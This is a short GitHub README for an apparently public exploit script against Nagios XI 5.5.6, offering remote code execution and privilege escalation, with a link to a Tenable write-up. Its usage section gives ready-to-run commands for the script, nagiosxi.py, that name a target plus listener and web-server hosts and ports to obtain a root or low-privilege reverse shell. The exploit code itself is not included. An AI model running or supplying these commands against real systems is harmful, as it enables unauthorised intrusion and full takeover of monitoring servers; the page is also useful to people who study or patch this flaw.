Skip to content

Latest commit

 

History

History
26 lines (15 loc) · 774 Bytes

README.md

File metadata and controls

26 lines (15 loc) · 774 Bytes

Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation

1.  Nagios XI 5.5.6

Explanation of the exploit

https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172

Script Usage:

python3 nagiosxi.py -h

For root shell

python3 nagiosxi.py -t https://10.10.10.10 -lh 172.16.1.2 -lp 7777 -wh 172.16.1.2 -wp 8888

For low privilege shell

python3 nagiosxi.py -t https://10.10.10.10 -lh 172.16.1.2 -lp 7777 -wh 172.16.1.2 -wp 8888 -shell low